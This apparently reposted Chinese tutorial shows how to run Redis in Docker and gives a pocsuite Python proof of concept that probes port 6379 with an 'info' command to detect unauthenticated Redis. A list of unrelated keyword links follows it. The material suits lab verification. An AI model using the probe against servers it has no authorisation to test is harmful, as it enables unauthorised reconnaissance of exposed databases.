Redis未授权访问docker复现
发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,docker搜索Redis镜像docker search redis拉去镜像到本地docker pull redis查看下载好的镜像docker images运行镜像docker run -p 637
千家信息网最后更新 2025年12月02日Redis未授权访问docker复现
docker搜索Redis镜像
docker search redis拉去镜像到本地
docker pull redis查看下载好的镜像
docker images运行镜像
docker run -p 6379:6379 -d redis-p 将容器的6379端口映射到主机的6379端口。
-d 将容器后台运行。
查看运行中的镜像
docker psPOC构成
#!/usr/bin/env python# -*- coding: utf-8 -*-import socketfrom pocsuite.utils import registerfrom pocsuite.poc import Output, POCBaseclass TestPOC(POCBase): vulID = '0' version = '1' author = 'nw01f' vulDate = '2018-10-23' createDate = '2018-10-23' updateDate = '2018-10-23' references = ['http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/'] name = 'Redis Unauthorized' appPowerLink = 'https://www.redis.io' appName = 'Redis' appVersion = 'All' vulType = 'Unauthorized' desc = ''' redis Unauthorized ''' samples = [''] def _verify(self): result = {} payload = '\x69\x6e\x66\x6f\x0d\x0a' ## info/r/n s = socket.socket() socket.setdefaulttimeout(4) try: host = self.url.split(':')[1].strip('/') if len(self.url.split(':')) > 2: port = int(self.url.split(':')[2].strip('/')) else: port = 6379 s.connect((host, port)) s.send(payload) data = s.recv(1024) if data and 'redis_version' in data: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = self.url result['VerifyInfo']['port'] = port result['VerifyInfo']['result'] = data[:20] except Exception as e: print e s.close() return self.parse_attack(result) def _attack(self): return self._verify() def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail("error") return outputregister(TestPOC)参考链接
http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/
镜像
运行
容器
端口
主机
后台
链接
utf-8
参考
搜索
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
武侠q传v19星耀版服务器
烟台软件开发技术公司
riads数据库
泰州高防服务器
数据库安装位置要求
数字化转型传统数据库问题
搭建自己的服务器梯子
武汉云时千正网络技术有限公司
青浦区正规软件开发哪家好
软件开发平台是指
重庆微信软件开发
废旧服务器主板含有多少黄金
计算机网络技术毕业设置
朗新科技城市互联网
网络技术方案文档例子
小软件开发价格
晋业零售服务器无法连通
弘芯服务器
国内的cdn加速的国外服务器商
网络安全指南和安全评估文档
网络安全计算题
网络安全中的认证方法
黑莓q20 服务器
阿里云服务器缓存故障的原因
职工信息数据库
梦三国与服务器连接失败
roblox服务器出现问题
长宁区综合网络技术销售厂
三级数据库技术证书有什么用
无线路由改打印服务器